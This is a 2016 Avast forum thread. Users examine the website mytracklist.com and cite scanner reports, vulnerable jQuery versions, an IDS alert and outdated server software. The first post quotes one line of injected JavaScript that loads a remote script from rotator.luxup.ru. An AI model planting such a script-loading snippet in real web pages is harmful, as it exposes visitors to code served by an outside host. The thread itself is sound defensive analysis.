Author Topic: Is this suspicious website flagged by Avast? LeaseWeb B.V. abuse!  (Read 1934 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34034
  • malware fighter
Re 4 suspicious pages detected: http://killmalware.com/mytracklist.com/
As for now missed by VT: https://www.virustotal.com/en/url/f547a6c510ef2609748150fdbf138e624ec6abe77ed0bbd5a6bdbcb562687811/analysis/#additional-info
Sucuri has it liated as malicious: https://sitecheck.sucuri.net/results/mytracklist.com :
Quote
Suspicious domain detected. Details: http://sucuri.net/malware/malware-entry-mwblacklisted35
document.write('<scr'+'ipt type="text/javascript" src="-http://rotator.luxup.ru/top/39/?t='+((new Date()).getTime()%10000000)*100+Math.round(Math.random()*99)+'"><'+'/scr'+'ipt>');
Two scripts detected:
Script loaded: -http://rotator.luxup.ru/top/39/?t=22124440082
Script loaded: -http://rotator.luxup.ru/bottom/56;56/?t=22125110029

jQuery vulnerability: -http://mytracklist.com
Detected libraries:
jquery - 1.7 : -http://mytracklist.com/js/jquery-1.7.min.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
jquery - 1.2.6 : -http://mytracklist.com/js/jquery.js
Info: Severity: medium
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4969
http://research.insecurelabs.org/jquery/test/
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
2 vulnerable libraries detected

IDS alert for ET INFO DNS Query to a *.pw domain - Likely Hostile -> https://urlquery.net/report.php?id=1456692367524

Leaseweb abuse IP badness history: https://www.virustotal.com/en/ip-address/37.48.81.152/information/

pol
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Secondmineboy

  • Avast Evangelist
  • Massive Poster
  • ***
  • Posts: 3645
Re: Is this suspicious website flagged by Avast? LeaseWeb B.V. abuse!
« Reply #1 on: February 28, 2016, 10:09:16 PM »
Nothing by Avast.

Also outdated Nginx and PHP: http://prntscr.com/a95nhu
Windows 10 1909, 4 GB DDR3 RAM, 500 GB 5400 RPM HDD, 1366 by 768 LCD Screen, Intel Core i3 5010U Dual Core, Intel HD Graphics 5500
HUAWEI P30 Pro. Android 10